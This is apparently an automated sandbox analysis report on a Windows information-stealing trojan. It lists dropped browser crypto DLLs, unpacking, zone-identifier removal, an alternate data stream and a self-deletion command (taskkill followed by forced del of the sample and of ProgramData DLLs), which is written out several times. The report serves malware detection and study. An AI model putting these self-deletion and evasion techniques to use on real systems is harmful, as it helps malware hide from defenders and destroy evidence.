Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004998E0	0_2_004998E0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00442210	0_2_00442210
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004B5310	0_2_004B5310
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004B339E	0_2_004B339E
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0049BCD0	0_2_0049BCD0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004B451C	0_2_004B451C
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004B3E40	0_2_004B3E40
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004AE633	0_2_004AE633
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0049E6F0	0_2_0049E6F0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03453B3F	0_2_03453B3F
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0343E940	0_2_0343E940
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0344E883	0_2_0344E883
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03454090	0_2_03454090
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03455560	0_2_03455560
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_034535EE	0_2_034535EE

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: String function: 03444700 appears 40 times
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: String function: 00401020 appears 70 times
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: String function: 004A44B0 appears 44 times

Source: MSQNZmmg2F.exe, 00000000.00000003.262696043.000000000432B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs MSQNZmmg2F.exe
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePatientRecordManagementSystem.exe@ vs MSQNZmmg2F.exe

Source: MSQNZmmg2F.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: MSQNZmmg2F.exe	Virustotal: Detection: 36%
Source: MSQNZmmg2F.exe	ReversingLabs: Detection: 66%

Source: MSQNZmmg2F.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MSQNZmmg2F.exe 'C:\Users\user\Desktop\MSQNZmmg2F.exe'
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe 'C:\ProgramData\VKOTTYY7FG6Q1H0K.exe'
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im MSQNZmmg2F.exe /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe 'C:\ProgramData\VKOTTYY7FG6Q1H0K.exe'	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im MSQNZmmg2F.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSQNZmmg2F.exe")

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/23@3/4

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSQNZmmg2F.exe, 00000000.00000003.247390446.0000000003480000.00000004.00000001.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: MSQNZmmg2F.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: MSQNZmmg2F.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: softokn3[1].dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSQNZmmg2F.exe, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: MSQNZmmg2F.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3[1].dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSQNZmmg2F.exe, nss3.dll.0.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: MSQNZmmg2F.exe, nss3.dll.0.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: softokn3[1].dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.0.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_00493CB0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,std::_Lockit::_Lockit,std::ios_base::_Ios_base_dtor,

0_2_00493CB0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: MSQNZmmg2F.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: MSQNZmmg2F.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
Source:	Binary string: C:\hoxanirumoxa19\hoterin66_xelenibilova\biwixiz\do.pdb source: MSQNZmmg2F.exe
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.0.dr
Source:	Binary string: 1C:\hoxanirumoxa19\hoterin66_xelenibilova\biwixiz\do.pdb`;J source: MSQNZmmg2F.exe
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.0.dr

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Unpacked PE file: 0.2.MSQNZmmg2F.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Unpacked PE file: 0.2.MSQNZmmg2F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004A22B7 push ecx; ret	0_2_004A22CA
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004A44F5 push ecx; ret	0_2_004A4508
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03444745 push ecx; ret	0_2_03444758
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03442507 push ecx; ret	0_2_0344251A

Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: mozglue[1].dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: mozglue.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_004B1489 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_004B1489

Source: initial sample

Static PE information: section name: .text entropy: 7.82517098511

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\al[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit			Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

File opened: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

File created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe TID: 6460	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe TID: 6356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6516	Thread sleep count: 49 > 30	Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll	Jump to dropped file
